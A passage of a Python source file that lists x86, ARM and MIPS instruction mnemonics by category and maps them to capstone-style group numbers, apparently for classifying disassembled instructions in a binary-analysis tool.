"CMOVNZ",
"CMOVO",
"CMOVP",
"CMOVPE",
"CMOVPO",
"CMOVS",
"CMOVZ",
"BSWAP",
"XCHG",
"XADD",
"CMPXCHG",
"CMPXCHG8B",
"POP",
"POPA",
"POPAD",
"PUSH",
"PUSHA",
"PUSHAD",
"CDQ",
"CDQE",
"CBW",
"CWD",
"CWDE",
"MOV",
"MOVD",
"MOVQ",
"MOVABS",
"MOVSX",
"MOVSXD",
"MOVZX",
"MOVZXD",
# string
"MOVS",
"MOVSB",
"MOVSD",
"MOVSW",
"STOS",
"STOSB",
"STOSD",
"STOSW",
"LODS",
"LODSB",
"LODSD",
"LODSW",
# segment register
"LDS",
"LES",
"LFS",
"LGS",
"LSS",
# user mode extended
"XSAVE",
"XSAVEC",
"XSAVEOPT",
"XRSTOR",
"XGETBV",
"XSETBV",
# BMI1, BMI2
"BEXTR",
"BLSI",
"PDEP",
"PEXT",
# MMX
"PACKSSDW",
"PACKSSWB",
"PACKUSDW",
"PACKUSWB",
"PUNPCKHBW",
"PUNPCKHDQ",
"PUNPCKHWD",
"PUNPCKLBW",
"PUNPCKLDQ",
"PUNPCKLWD",
"EMMS",
# SSE 64-bit integer
"PMOVMSKB",
"PSHUFW",
# SSE2 128-bit integer
"MOVDQA",
"MOVDQU",
"MOVQ2DQ",
"MOVDQ2Q",
"PSHUFLW",
"PSHUFHW",
"PSHUFD",
"PUNPCKLQDQ",
"PUNPCKHQDQ",
# SSSE2
"PSHUFB",
"PALIGNR",
# SSE4
"MOVNTDQA",
"PBLENDVB",
"PBLENDW",
"PINSRB",
"PINSRD",
"PINSRQ",
"PEXTRB",
"PEXTRW",
"PEXTRD",
"PEXTRQ",
"PMOVSXBW",
"PMOVZXBW",
"PMOVSXBD",
"PMOVZXBD",
"PMOVSXWD",
"PMOVZXWD",
"PMOVSXBQ",
"PMOVZXBQ",
"PMOVSXWQ",
"PMOVZXWQ",
"PMOVSXDQ",
"PMOVZXDQ",
"PACKUSDW",
"LGDT",
"SGDT",
"LLDT",
"SLDT",
"LTR",
"STR",
"LIDT",
"SIDT",
"MOV",
"LMSW",
"SMSW",
"CLTS",
"LSL",
"LAR",
"VERR",
"VERW",
# 64-bit
"CDQE",
"CQO",
]
X86_GRP_FLOAT_DTRANSFER = [
# floating point instrutions
"FLD",
"FST",
"FSTP",
"FILD",
"FIST",
"FISTP",
"FBLD",
"FBSTP",
"FXCH",
"FCMOVB",
"FCMOVBE",
"FCMOVE",
"FCMOVNB",
"FCMOVNBE",
"FCMOVNE",
"FCMOVNU",
"FCMOVU",
# floating point load const instructions
"FLD1",
"FLDZ",
"FLDPI",
"FLDL2E",
"FLDLN2",
"FLDL2T",
"FLDLG2",
# FPU register related
"FCLEX",
"FFREE",
"FINIT",
"FLDCW",
"FLDENV",
"FNCLEX",
"FNINIT",
"FNOP",
"FNSAVE",
"FNSTCW",
"FNSTENV",
"FNSTSW",
"FRSTOR",
"FSAVE",
"FSTCW",
"FSTENV",
"FSTSW",
# SSE
"MOVAPS",
"MOVUPS",
"MOVHPS",
"MOVHLPS",
"MOVLPS",
"MOVLHPS",
"MOVMSKPS",
"MOVSS",
# SSE2
"MOVAPD",
"MOVUPD",
"MOVHPD",
"MOVHLPD",
"MOVLPD",
"MOVLHPD",
"MOVMSKPD",
"MOVSD",
# SSE Shuffle
"SHUFPS",
"UNPCKHPS",
"UNPCKLPS",
# SSE2 shuffle
"SHUFPD",
"UNPCKHPD",
"UNPCKLPD",
# SSE Conversion
"CVTPI2PS",
"CVTSI2SS",
"CVTPS2PI",
"CVTTPS2PI",
"CVTSS2SI",
"CVTTSS2SI",
# SSE2 Conversion
"CVTPD2PI",
"CVTTPD2PI",
"CVTPI2PD",
"CVTPD2DQ",
"CVTTPD2DQ",
"CVTDQ2PD",
"CVTPS2PD",
"CVTPD2PS",
"CVTSS2SD",
"CVTSD2SS",
"CVTSD2SI",
"CVTTSD2SI",
"CVTSI2SD",
"CVTDQ2PS",
"CVTPS2DQ",
"CVTTPS2DQ",
# SSE MXCSR State
"LDMXCSR",
"STMXCSR",
# SSE 64-bit
"PEXTRW",
"PINSRW",
# SSE cache
"MASKMOVQ",
"MOVNTQ",
"MOVNTPS",
"PREFETCH",
"SFENCE",
# SSE3
"FISTTP",
"LDDQU",
"MOVSHDUP",
"MOVSLDUP",
"MOVDDUP",
# SSE4
"BLENDPD",
"BLENDPS",
"BLENDVPD",
"BLENDVPS",
"EXTRACTPS",
"INSERTPS",
# 16-bit FP
"VCVTPS2PH",
"VCVTPS2PH",
# Vector
"VALIGN",
"VBLEND",
"VCOMPRESS",
"VEXTRACT",
"VINSERT",
"VMOV",
"VFIXUP",
"VGET",
"VEXPAND",
"VCVT",
"VPBLEND",
"VPBROAD",
"VPCOMPRESS",
"VPERM" "VPEXPAND" "VPMOV",
"VPSCATTER",
"VSCATTER",
"VSHUF",
]
# - Miscellaneous Instructions:
X86_GRP_MISC = [
"NOP",
"UD",
"UD2",
"LEA",
"XLAT",
"XLATB",
"CPUID",
"MOVBE",
"PREFETCHW",
"PREFETCHWT1",
"CLFLUSH",
"CLFLUSHOPT",
# SSE2 cache
"CLFLUSH",
"LFENCE",
"MFENCE",
"MASKMOVDQU",
"MOVNTPD",
"MOVNTDQ",
"MOVNTI",
]
X86_GRP_ARITH = [
# general purpose binary arithmetic instructions
"ADCX",
"ADOX",
"ADC",
"ADD",
"XADD",
"SUB",
"SBB",
"IMUL",
"MUL",
"IDIV",
"DIV",
"INC",
"DEC",
"NEG",
"CMP",
# decimal arithmetic instructions
"DAA",
"DAS",
"AAA",
"AAS",
"AAM",
"AAD",
# flag
"STC",
"CLC",
"CMC",
"CLD",
"STD",
# BMI1, BMI2
"MULX",
# MMX
"PADD",
"PADDB",
"PADDW",
"PADDD",
"PADDSB",
"PADDSW",
"PADDUSB",
"PADDUSW",
"PSUB",
"PSUBB",
"PSUBW",
"PSUBD",
"PSUBSB",
"PSUBSW",
"PSUBUSB",
"PSUBUSW",
"PMULHW",
"PMULLW",
"PMADDWD",
# SSE 64bit integer
"PAVGB",
"PAVGW",
"PMAXUB",
"PMAXSB",
"PMINUB",
"PMINSB",
"PMULHUW",
"PSADBW",
# SSE 128-bit integer
"PMULUDQ",
"PADDQ",
"PSUBQ",
# SSSE3
"PHADDW",
"PHADDSW",
"PHADDD",
"PHSUBW",
"PHSUBSW",
"PHSUBD",
"PABSB",
"PABSW",
"PABSD",
"PABSQ",
"PMADDUBSW",
"PMULHRSW",
"PSIGNB",
"PSIGNW",
"PSIGND",
# SSE4
"PMULLD",
"PMULDQ",
"PMINUW",
"PMINUD",
"PMINSB",
"PMINSD",
"PMAXUW",
"PMAXUD",
"PMAXSB",
"PMAXSD",
"ROUNDPS",
"ROUNDPD",
"ROUNDSS",
"ROUNDSD",
"PMPSADBW",
# AESNI
"AESDEC",
"AESDECLAST",
"AESENC",
"AESENCLAST",
"AESIMC",
"AESKEYGENASSIST",
"PCLMULQDQ",
# SHA1
"SHA1MSG1",
"SHA1MSG2",
"SHA1NEXTE",
"SHA1RNDS4",
"SHA256MSG1",
"SHA256MSG2",
"SHA256RNDS2",
"CRC32",
# BMI1, BMI2
"BLSMSK",
"BLSR",
"CLAC",
"STAC",
]
X86_GRP_FLOAT_CMP = [
# floating point compare instructions
"FCOM",
"FCOMP",
"FCOMPP",
"FUCOM",
"FUCOMP",
"FUCOMPP",
"FICOM",
"FICOMP",
"FCOMI",
"FUCOMI",
"FCOMIP",
"FUCOMIP",
"FTST",
"FXAM",
# SSE
"CMPPS",
"CMPEQPS",
"CMPNEQPS",
"CMPLTPS",
"CMPNLTPS",
"CMPSS",
"CMPEQSS",
"CMPNEQSS",
"CMPLTSS",
"CMPNLTSS",
"COMISS",
"UCOMISS",
"CMPPD",
"CMPEQPD",
"CMPNEQPD",
"CMPLTPD",
"CMPNLTPD",
"CMPSD",
"CMPEQSD",
"CMPNEQSD",
"CMPLTSD",
"CMPNLTSD",
"COMISD",
"UCOMISD",
# vector
"VPCMP",
]
X86_GRP_FLOAT_ARITH = [
# - floating point instructions:
"FADD",
"FADDP",
"FIADD",
"FSUB",
"FSUBP",
"FISUB",
"FSUBR",
"FSUBRP",
"FISUBR",
"FMUL",
"FMULP",
"FIMUL",
"FDIV",
"FDIVP",
"FIDIV",
"FDIVR",
"FDIVRP",
"FIDIVR",
"FPREM",
"FPREM1",
"FABS",
"FCHS",
"FRNDINT",
"FSCALE",
"FSQRT",
"FXTRACT",
# floating point transcendental instructions
"FSIN",
"FCOS",
"FSINCOS",
"FPTAN",
"FPATAN",
"F2XM1",
"FYL2X",
"FYL2XP1",
# fpu register related
"FINCSTP",
"FDECSTP",
# SSE
"ADDPS",
"ADDSS",
"SUBPS",
"SUBSS",
"MULPS",
"MULSS",
"DIVPS",
"DIVSS",
"RCPPS",
"RCPSS",
"SQRTPS",
"SQRTSS",
"RSQRTPS",
"RSQRTSS",
"MAXPS",
"MAXSS",
"MINPS",
"MINSS",
# SSE2
"ADDSD",
"SUBSD",
"MULSD",
"DIVSD",
"RCPSD",
"SQRTSD",
"RSQRTSD",
"MAXSD",
"MINSD",
# SSE3
"ADDSUBPS",
"ADDSUBPD",
"HADDPS",
"HSUBPS",
"HADDPD",
"HSUBPD",
# SSE4
"DPPD",
"DPPS",
# vector
"VPMAX",
"VPMIN",
"VRCP",
"VRNDSCAL",
"VRSQRT",
"VSCALE",
"ADDPD",
"ADDSD",
"MULPD",
"MULSD",
"SUBPD",
"SUBSD",
"DIVPD",
"DIVSD",
"RCPPD",
"RCPSD",
]
X86_GRP_CMP = [
"CMP",
"COMI",
"CLT",
# from dtransfer
"CMPXCHG",
"CMPXCHG8B",
# from bit
"TEST",
# from string
"CMPS",
"CMPSB",
"CMPSD",
"CMPSW",
# MMX
"PCMPEQB",
"PCMPEQW",
"PCMPEQD",
"PCMPGTB",
"PCMPGTW",
"PCMPGTD",
# SSE4
"PHMINPOSUW",
"PTEST",
"PCMPEQQ",
# SSE4.2
"PCMPESTRI",
"PCMPESTRM",
"PCMPISTRI",
"PCMPISTRM",
"PCMPGTQ",
# Vector
"VPTEST",
]
# Shift and Rotate Instructions:
X86_GRP_SHIFT = [
# general purpose instructions
"SAR",
"SHR",
"SAL",
"SHL",
"SHRD",
"SHLD",
"ROR",
"ROL",
"RCR",
"RCL",
# BMI1, BMI2
"RORX",
"SARX",
"SHLX",
"SHRX",
# MMX
"PSLLW",
"PSLLD",
"PSLLQ",
"PSRLW",
"PSRLD",
"PSRLQ",
"PSRAW",
"PSRAD",
# SSE2 128-bit integer
"PSLLDQ",
"PSRLDQ",
# vector
"VPROL",
"VPROR",
"VPSRA",
"VPSLL",
"VPSRA",
]
# Logical Instructions:
X86_GRP_LOGIC = [
# general purpose instructions
"AND",
"NOT",
"OR",
"XOR",
# BMI1, BMI2
"ANDN",
# MMX
"PAND",
"PANDN",
"POR",
"PXOR",
# SSE
"ANDPS",
"ANDNPS",
"ORPS",
"XORPS",
# SSE2
"ANDPD",
"ANDNPD",
"ORPD",
"XORPD",
# Vector
"VPTERLOG",
]
# bit and byte instructions:
X86_GRP_BIT = [
# general purpose instructions
"SETA",
"SETAE",
"SETB",
"SETBE",
"SETC",
"SETE",
"SETG",
"SETGE",
"SETL",
"SETLE",
"SETNA",
"SETNAE",
"SETNB",
"SETNBE",
"SETNC",
"SETNE",
"SETNG",
"SETNGE",
"SETNL",
"SETNLE",
"SETNO",
"SETNP",
"SETNS",
"SETNZ",
"SETO",
"SETP",
"SETPE",
"SETPO",
"SETS",
"SETZ",
"TEST",
"CRC32",
# BMI1, BMI2
"BLSMSK",
"BLSR",
"CLAC",
"STAC",
# from bit
"TEST",
"BT",
"BTS",
"BTR",
"BTC",
"BSF",
"BSR",
"POPCNT",
"TZCNT",
"LZCNT",
]
# control transfer instructions:
X86_GRP_CTRANSFER = [
# general purpose instructions
"JMP",
"CALL",
"RET",
"IRET",
"INT",
"INTO",
"BOUND",
"ENTER",
"LEAVE",
# flag
"CLI",
"STI",
# SSE2
"PAUSE",
# SSE3
"MONITOR",
"MWAIT",
"XABORT",
"XACQUIRE",
"XRELEASE",
"XBEGIN",
"XEND",
"XTEST",
"HLT",
"SYSCALL",
"SYSENTER",
"SYSEXIT",
"SYSRET",
"FWAIT",
"WAIT",
# vm related instructions
"VMCALL",
"VMLAUNCH",
"VMMCALL",
"VMRESUME",
"VMRUN",
"VMFUNC",
"VMCLEAR",
"VMXON",
"VMXOFF",
]
X86_GRP_COND_CTRANSFER = [
# general purpose instructions
"JA",
"JAE",
"JB",
"JBE",
"JC",
"JCXZ",
"JE",
"JECXZ",
"JRCXZ",
"JG",
"JGE",
"JL",
"JLE",
"JNAE",
"JNB",
"JNBE",
"JNC",
"JNE",
"JNG",
"JNGE",
"JNL",
"JNLE",
"JNO",
"JNP",
"JNS",
"JNZ",
"JO",
"JP",
"JPE",
"JPO",
"JS",
"JZ",
"LOOP",
"LOOPE",
"LOOPNE",
"LOOPNZ",
"LOOPZ",
# string
"REP",
"REP MOVSQ",
"REP STOSQ",
"REPNE",
"REPNZ",
"REPE",
"REPZ",
]
# ==================== ARM 32 =============================================
ARM_GRP_DTRANSFER = [
# general purpose instructions
"LDA",
"ADR",
"ADRP",
"LDR",
"LDRD",
"LDRB",
"LDRBT",
"LDRH",
"LDRS",
"LDRSB",
"LDRSBT",
"LDRSH",
"LDRSHT",
"LDRT",
"LDRHT",
"STR",
"STRB",
"STRD",
"STRH",
"STRBT",
"STRT",
"LDM",
"LDMDA",
"LDMDB",
"LDMIB",
"STM",
"STMDA",
"STMDB",
"STMIB",
"PLD",
"SWP",
"MOV",
"MOVI",
"MOVK",
"MOVZ",
"MOVT",
"MOVN",
"MVN",
"MVNI",
"STP",
"LDP",
"RFEIB",
# coprocessor data operations
"CDP",
"MCR",
"MCRR",
"MRC",
"MRR",
"LDC",
"LDCL",
"STC",
"STCL",
"PUSH",
"SBFX",
"SBFIZ",
"BFX",
"BFXIL",
"UBFX",
"UBFIZ",
"VLD",
"VST",
"VST2",
"VSTMDB",
"VTBL",
"VTBX",
"ZIP",
"ZIP1",
"ZIP2",
"UZP",
"UZP1",
"UZP2",
"XTN",
"XTN2",
"CSEL",
"LD1",
"LD2",
"LD4",
"ST1",
"ST2",
"ST4",
"LDPSW",
"LDRSW",
"SXTAB",
"SXTB",
"SXTH",
"SXTW",
"EXT",
"EXTR",
"INS",
"UXTAB",
"UXTB",
"UXTH",
"UXTW",
"BFC",
"BFI",
"BIC",
"CLZ",
"REV",
"REV16",
"REV32",
"REV64",
"CSET",
]
ARM_GRP_FLOAT_DTRANSFER = [
# floating point data transfer instructions
"FCPY",
"FCVTMS",
"FCVTMU",
"FCVTZS",
"FCVTZU",
"FCVT",
"FLD",
"FST",
"FMR",
"FMD",
"FMS",
"FMX",
"FSITO",
"FUITO",
"FTOSI",
"FTOUI",
"FMOV",
"UMOV",
"LDUR",
"LDURB",
"LDURH",
"LDURSB",
"LDURSH",
"LDURSW",
"STUR",
"STURB",
"STURH",
"STURSB",
"STURSH",
"STURSW",
"DUP",
"SCVTF",
"UCVTF",
]
ARM_GRP_MISC = [
"UDF",
"NOP",
"MRS",
"MSR",
"MAR",
"MRA",
"VMRS",
"VMSR",
"DBG",
"DMB",
"DSB",
"ISB",
"SETEND",
]
# binary arithmetic instructions:
ARM_GRP_ARITH = [
# general purpose instructions
"ADD",
"ADDW",
"ADDP",
"ADDV",
"ADC",
"SUB",
"SBC",
"RSB",
"RSC",
"CMN",
"CLZ",
"MUL",
"MLA",
"MLS",
"CINC",
"CINV",
"NEG",
"NEGS",
"DIV",
"SMAX",
"SMAXV",
"SMIN",
"SMINV",
"UMULL",
"UMLAL",
"UMLAL2",
"SMLA",
"SMLAL",
"SMLALTT",
"SMUL",
"SMSUB",
"MADD",
"MNEG",
"MSUB",
"SMADDL",
"SMNEGL",
"SMSUBL",
"SMULH",
"SMULL",
"UMADDL",
"UMNEGL",
"UMSUBL",
"UMULH",
"UMULL",
"SDIV",
"UDIV",
"MIA",
"QADD",
"QSUB",
"QDADD",
"QDSUB",
"QASX",
"SADD",
"SADDW",
"SADDW2",
"SASX",
"SHADD",
"SHASX",
"SMLSD",
"SMMLA",
"SMUAD",
"SMUSD",
"SSUB",
"SAT",
"SAX",
"UADD",
"UADDW",
"UADDW2",
"USAT",
"USAX",
"UASX",
"UHADD",
"UHASX",
"UMLSD",
"UMMLA",
"UQADD",
"UQSAX",
"UQSUB",
"UHSAX",
"VABA",
"VABD",
"MAX",
"MIN",
"VMLA",
"VMLS",
"VNMUL",
"VNMLA",
"VNMLS",
"VFMS",
"VFMS",
"VFMA",
"VFMS",
"VFNMA",
"VFNMS",
"VRECPE",
"VSQRT",
"VQRSH",
"UMULL",
"UMAAL",
"UMLAL",
"USADA8",
"VNEG",
"CNEG",
"CSINC",
"CSINV",
"CSNEG",
]
ARM_GRP_FLOAT_ARITH = [
# floating point arithmetic instructions
"FABS",
"FABD",
"FADD",
"FSUB",
"FDIV",
"FMUL",
"FNMUL",
"FSQRT",
"FMAC",
"FNMAC",
"FMSC",
"FNMSC",
"FNEG",
"FMADD",
"FMSUB",
"FNMADD",
"FNMSUB",
"FPINT",
"FCSEL",
"FMAX",
"FMIN",
"FMLA",
"FMLS",
"FRINTM",
"FRINTP",
"FRINT",
]
ARM_GRP_SHIFT = [
# shift operations
"ASR",
"LSL",
"LSR",
"ROR",
"RRX",
"PKHBT",
"PKHTB",
"SHL",
"USHL",
"USHLL",
"USHLL2",
"USHR",
"USRA",
"SSHL",
"SSHLL",
"SSHLL2",
"SSHR",
]
ARM_GRP_CMP = [
# compare instructions
"CMEQ",
"CMGT",
"CMHI",
"CMHS",
"CMP",
"CCMN",
"CCMP",
"VCEQ",
"VCGE",
"VCGT",
"VCLE",
"VCLT",
# from bit
"TST",
"TEQ",
]
ARM_GRP_FLOAT_CMP = [
"VCMP",
"VCMPE",
"FCMPE",
"FCMGT",
"FCM",
"FCMP",
"FCCMP",
"VCM",
]
# Logical Instructions:
ARM_GRP_LOGIC = [
"AND",
"ORR",
"EOR",
"EON",
"ORN",
]
# bit and byte instructions:
ARM_GRP_BIT = [
"TST",
"TEQ",
"BSL",
"BIF",
"BIT",
"BFC",
"BFI",
"BIC",
"CLZ",
"RBIT",
"REV",
"REV16",
"REV32",
"REV64",
"CSET",
]
# control transfer instructions:
ARM_GRP_CTRANSFER = [
"B",
"BR",
"BL",
"BLR",
"BX",
"BLX",
"BXJ",
"BAL",
"BLAL",
"BXAL",
"BLXAL",
"BXJAL",
"SWI",
"BKPT",
"RET",
"YIELD",
"WFE",
"WFI",
"SEV",
"SEVL",
"CPS",
"BRK",
"HLT",
"SVC",
"HVC",
"SMC",
"TRAP",
"ERET",
# ARM POP is return
"POP",
]
ARM_GRP_COND_CTRANSFER = [
"BEQ",
"BNE",
"BCS",
"BCC",
"BMI",
"BPL",
"BVS",
"BVC",
"BHI",
"BLS",
"BGE",
"BLT",
"BGT",
"BLE",
"BLEQ",
"BLNE",
"BLCS",
"BLCC",
"BLMI",
"BLPL",
"BLVS",
"BLVC",
"BLHI",
"BLLS",
"BLGE",
"BLLT",
"BLGT",
"BLLE",
"BXEQ",
"BXNE",
"BXCS",
"BXCC",
"BXMI",
"BXPL",
"BXVS",
"BXVC",
"BXHI",
"BXLS",
"BXGE",
"BXLT",
"BXGT",
"BXLE",
"BLXEQ",
"BLXNE",
"BLXCS",
"BLXCC",
"BLXMI",
"BLXPL",
"BLXVS",
"BLXVC",
"BLXHI",
"BLXLS",
"BLXGE",
"BLXLT",
"BLXGT",
"BLXLE",
"BXJEQ",
"BXJNE",
"BXJCS",
"BXJCC",
"BXJMI",
"BXJPL",
"BXJVS",
"BXJVC",
"BXJHI",
"BXJLS",
"BXJGE",
"BXJLT",
"BXJGT",
"BXJLE",
"TBZ",
"TBNZ",
# combined instructions
"CBZ",
"CBNZ",
]
# ==================== MIPS 32 =============================================
# data transfer
# refernce : https://www.cs.cornell.edu/courses/cs3410/2008fa/MIPS_Vol2.pdf
MIPS_GRP_DTRANSFER = [
"LB",
"LBU",
"LH",
"LHU",
"LL",
"LW",
"LWU",
"LD",
"LDL",
"LDR",
"LWL",
"LWR",
"PREF",
"SB",
"SC",
"SD",
"SDL",
"SDR",
"SH",
"ST",
"SW",
"SWL",
"SWR",
"SYNC",
"LUI",
"LDXC1",
"LWXC1",
"SDXC1",
"SWXC1",
"MFHI",
"MFLO",
"MOV",
"MOVF",
"MOVN",
"MOVT",
"MOVZ",
"MTHI",
"MTLO",
"MOVE",
"CVT",
"LDC",
"LWC",
"SDC",
"SWC",
# move
"CFC",
"CTC",
"MFC",
"MTC",
"PREF",
"SYNC",
"SPLAT",
"CFCMSA",
"CTCMSA",
"COPY",
"PUSH",
"SEH",
"SEB",
"WSBH",
"DSBH",
"DSHD",
"MTC0",
"MFC0",
"LDC3",
"LWC3",
"SDC3",
"SWC3",
# coprocessor load, store
"COP2",
"LDC2",
"LWC2",
"SDC2",
"SWC2",
# cop move
"CFC2",
"CTC2",
"MFC2",
"MTC2",
]
MIPS_GRP_FLOAT_DTRANSFER = [
# floating point
"FRINT",
"FCLASS",
# load, store, memory
"LDC1",
"LWC1",
"SDC1",
"SWC1",
# move
"CFC1",
"CTC1",
"MFC1",
"FMOV",
"MOVF",
"MOVN",
"MOVT",
"MOVZ",
"MTC1",
# convert
"FEX",
"FFINT",
"FFQ",
"FTINT",
"FTRUN",
"FTQ",
"FCVT",
"FLOOR",
"ROUND",
"TRUNC",
"FFLOOR",
"FROUND",
"FTRUNC",
"DMFC",
"DMFC1",
"DMTC",
"DMTC1",
"MTHC1",
"MFHC1",
]
# binary arithmetic instructions:
MIPS_GRP_ARITH = [
# general purpose instructions
"ADD",
"ADDI",
"ADDU",
"ADDIU",
"SUB",
"SUBU",
"MUL",
"MULT",
"MULTU",
"CLO",
"CLZ",
"DIV",
"DIVU",
"MADD",
"MADDU",
"MSUB",
"MSUBU",
"AADD",
"ASUB",
"ABS",
"NEG",
"NEGU",
# additional
"DAA",
"DSUB",
"DSUBU",
"DSUBIU",
"DDIV",
"DDIVU",
"DDIVIU",
"DMUL",
"DMULT",
"DMULTU",
"DOTP",
"DPADD",
"DPSUB",
"MADD",
"MAX",
"MIN",
"MSUB",
"MOD",
"SAT",
"HSUB",
"SQRT",
"AUI",
"DAUI",
"DAHI",
"DATI",
"ADDIUPC",
"AUIPC",
"ALUIPC",
"DADD",
"DADDU",
"DADDIU",
"DCLZ",
# from bit
"BMZ",
"BMN",
"BNEG",
]
MIPS_GRP_CMP = [
"SLT",
"SLTI",
"SLTIU",
"SLTU",
# compare instructions
"CMP",
"CEQ",
"CLE",
"CLT",
"CF",
"CUN",
"CEQ",
"CUEQ",
"COLT",
"CULT",
"COLE",
"CULE",
"CSF",
"CNGLE",
"CSEQ",
"CNGL",
"CLT",
"CNGE",
"CLE",
"CNGT",
"CMP",
"CEQ",
"CLE",
"CLT",
"CF",
"CUN",
"CEQ",
"CUEQ",
"COLT",
"CULT",
"COLE",
"CULE",
"CSF",
"CNGLE",
"CSEQ",
"CNGL",
"CLT",
"CNGE",
"CLE",
"CNGT",
"C",
]
MIPS_GRP_FLOAT_CMP = [
# floating point compare instructions
"FACF",
"FC",
"FS",
]
MIPS_GRP_SHIFT = [
# shift operation
"SLL",
"SLLV",
"SRL",
"SRLV",
"SRA",
"SRAV",
"SHL",
"SHR",
"SLD",
"DSLL",
"DSLL32",
"DSLLV",
"DSRA",
"DSRA32",
"DSRAV",
"DSRL",
"DSRL32",
"DSRLV",
"ROTR",
"ROTRV",
"DROTR",
"DROTR32",
"DROTRV",
"LSA",
"DLSA",
]
MIPS_GRP_FLOAT_ARITH = [
# floating point
"FABS",
"FADD",
"FDIV",
"FMADD",
"FMSUB",
"FMUL",
"FNEG",
"FNMADD",
"FNMSUB",
"FEXP",
"FLOG",
"FMAX",
"FMIN",
"FRCP",
"RECIP",
"FRECIP",
"FRSQRT",
"FSQRT",
"FSUB",
]
# Logical Instructions:
MIPS_GRP_LOGIC = [
"AND",
"ANDI",
"NOR",
"OR",
"NOT",
"ORI",
"XOR",
"XORI",
]
# bit and byte instructions:
MIPS_GRP_BIT = [
"BINS",
"DINS",
"DEXT",
"EXT",
"INS",
"BMZ",
"BMN",
"BNEG",
"BSEL",
"BSET",
"BCLR",
# bit wise count
"NLOC",
"NLZC",
"PCNT",
]
MIPS_GRP_MISC = [
"NOP",
"SSNOP",
"CACHE",
"TLBP",
"TLBR",
"TLBWI",
"TLBWR",
]
# control transfer instructions:
MIPS_GRP_CTRANSFER = [
"B",
"BAL",
"J",
"JAL",
"JR",
"JALR",
"BREAK",
"SYSCALL",
"PAUSE",
"WAIT",
"HLT",
"ERET",
"DERET",
"SDBBP",
"BKPT",
"RET",
"MFC0",
"MTC0",
# MIPS POP is return
"POP",
# float
"BC1",
"BC1F",
"BC1T",
"BC1FL",
"BC1TL",
# cop
"BC2F",
"BC2T",
"BC2FL",
"BC2TL",
"BC3F",
"BC3T",
"BC3FL",
"BC3TL",
]
MIPS_GRP_COND_CTRANSFER = [
"BEQ",
"BEQZ",
"BNE",
"BGE",
"BGEZ",
"BGEZAL",
"BGTZ",
"BLEZ",
"BLTZ",
"BLTZAL",
"BNEL",
"BNEZ",
"BNZ",
"TEQ",
"TEQI",
"TGE",
"TGEI",
"TGEIU",
"TGEU",
"TLT",
"TLTI",
"TLTIU",
"TLTU",
"TNE",
"TNEI",
"BEQL",
"BGEZALL",
"BGEZL",
"BGTZL",
"BLEZL",
"BLTZALL",
"BLTZL",
"BNEL",
]
# ============================================
# Below part creates dictionary which groups instructions
X86_GRP_MAP = {
9: X86_GRP_FLOAT_DTRANSFER + X86_GRP_FLOAT_CMP + X86_GRP_FLOAT_ARITH,
10: X86_GRP_MISC + X86_GRP_FLOAT_DTRANSFER + X86_GRP_DTRANSFER,
11: X86_GRP_FLOAT_ARITH + X86_GRP_SHIFT + X86_GRP_ARITH,
12: X86_GRP_LOGIC,
13: X86_GRP_COND_CTRANSFER + X86_GRP_CTRANSFER,
20: X86_GRP_FLOAT_DTRANSFER + X86_GRP_DTRANSFER,
21: X86_GRP_FLOAT_ARITH + X86_GRP_ARITH,
22: X86_GRP_FLOAT_CMP + X86_GRP_CMP,
23: X86_GRP_SHIFT,
24: X86_GRP_BIT,
26: X86_GRP_COND_CTRANSFER,
27: X86_GRP_CTRANSFER,
28: X86_GRP_MISC,
30: [],
}
ARM_GRP_MAP = {
9: ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_FLOAT_CMP + ARM_GRP_FLOAT_ARITH,
10: ARM_GRP_MISC + ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_DTRANSFER,
11: ARM_GRP_FLOAT_ARITH + ARM_GRP_SHIFT + ARM_GRP_ARITH,
12: ARM_GRP_LOGIC,
13: ARM_GRP_COND_CTRANSFER + ARM_GRP_CTRANSFER,
20: ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_DTRANSFER,
21: ARM_GRP_FLOAT_ARITH + ARM_GRP_ARITH,
22: ARM_GRP_FLOAT_CMP + ARM_GRP_CMP,
23: ARM_GRP_SHIFT,
24: ARM_GRP_BIT,
26: ARM_GRP_COND_CTRANSFER,
27: ARM_GRP_CTRANSFER,
28: ARM_GRP_MISC,
30: [],
}
# A64 does not allow instructions to be conditionally executed as ARM.
def _copy_for_arm64():
import copy
return copy.deepcopy(ARM_GRP_MAP)
ARM64_GRP_MAP = _copy_for_arm64()
# ARM instructions may have conditional suffix. Thus, initialize here. However,
# reference : http://infocenter.arm.com/help/index.jsp
ARM_COND_GROUPS = [9, 10, 11, 13, 20, 21, 22, 26]
ARM_GRP_COND_CODE = [
"EQ",
"NE",
"CS",
"HS",
"CC",
"LO",
"MI",
"PL",
"VS",
"VC",
"HI",
"LS",
"GE",
"LT",
"GT",
"LE",
"AL",
]
# for group_no in ARM_COND_GROUPS:
# for inst in ARM_GRP_MAP[group_no]:
# for cond in ARM_GRP_COND_CODE:
# ARM_GRP_MAP[group_no].append(inst + cond)
MIPS_GRP_MAP = {
9: MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_FLOAT_CMP + MIPS_GRP_FLOAT_ARITH,
10: MIPS_GRP_MISC + MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_DTRANSFER,
11: MIPS_GRP_FLOAT_ARITH + MIPS_GRP_SHIFT + MIPS_GRP_ARITH,
12: MIPS_GRP_LOGIC,
13: MIPS_GRP_COND_CTRANSFER + MIPS_GRP_CTRANSFER,
20: MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_DTRANSFER,
21: MIPS_GRP_FLOAT_ARITH + MIPS_GRP_ARITH,
# mips usually contains compare in conditional branch
22: MIPS_GRP_FLOAT_CMP + MIPS_GRP_CMP + MIPS_GRP_COND_CTRANSFER,
23: MIPS_GRP_SHIFT,
24: MIPS_GRP_BIT,
26: MIPS_GRP_COND_CTRANSFER,
27: MIPS_GRP_CTRANSFER,
28: MIPS_GRP_MISC,
30: [],
}
# ============================================
GRP_NO_MAP = {
# Among capstone's default mapping, use 1, 2, 3 as they are common in all
# architectures.
1: "grp_jump",
2: "grp_call",
3: "grp_ret",
9: "floatinst",
10: "abs_dtransfer",
11: "abs_arith",
12: "logic",
13: "abs_ctransfer",
20: "dtransfer",
21: "arith",
22: "cmp",
23: "shift",
24: "bitflag",
26: "cndctransfer",
27: "ctransfer",
28: "misc",
30: "unknown",
}
GRP_NAME_MAP = {val: key for key, val in GRP_NO_MAP.items()}
# ============================================
# Below part maps capstone's internal instruction numbers to pre-defined groups
def _check_inst(target_inst, check_list, suffixes=[]):
target_inst = target_inst.split("_")[0]
